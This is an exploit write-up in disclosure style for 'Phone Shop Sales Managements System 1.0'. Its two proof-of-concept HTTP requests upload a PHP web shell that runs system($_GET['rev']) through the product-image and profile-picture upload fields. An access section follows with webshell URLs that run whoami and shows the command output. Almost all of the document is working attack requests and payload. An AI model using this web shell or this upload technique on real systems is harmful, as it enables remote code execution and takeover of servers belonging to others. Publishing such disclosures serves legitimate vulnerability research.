# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP

# Both PoCs below upload a PHP file through an image-upload field. The handler stores the file under the
# client-supplied filename inside a web-accessible directory, so the uploaded rev.php is executed by the
# server when requested (see the "Access" section for the resulting paths).

###########
# PoC 1:  #
###########

Request:
========

POST /osms/Execute/ExAddProduct.php HTTP/1.1
Host: localhost
Content-Length: 2160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/AddNewProduct.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
Connection: close

------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductName"

camera
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BrandName"

soskod
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Quantity"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="TotalPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="DisplaySize"

15
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="OperatingSystem"

windows
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Processor"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="InternalMemory"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="RAM"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="CameraDescription"

lens
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BatteryLife"

3300
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Weight"

500
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Model"

AIG34
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Dimension"

5 inch
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ASIN"

9867638
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "result: ";system($_GET['rev']); ?>
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="date2"

2020-06-03
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Description"

accept
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="_wysihtml5_mode"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0--

###########
# PoC 2:  #
###########

Request:
========

POST /osms/Execute/ExChangePicture.php HTTP/1.1
Host: localhost
Content-Length: 463
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/UserProfile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
Connection: close

------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="IDUser"

6
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="Image"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "output: ";system($_GET['rev']); ?>
------WebKitFormBoundary4Dm8cGBqGNansHqI--

###########
# Access: #
###########

# Webshell access via:

PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami

# Output:

result: windows10\user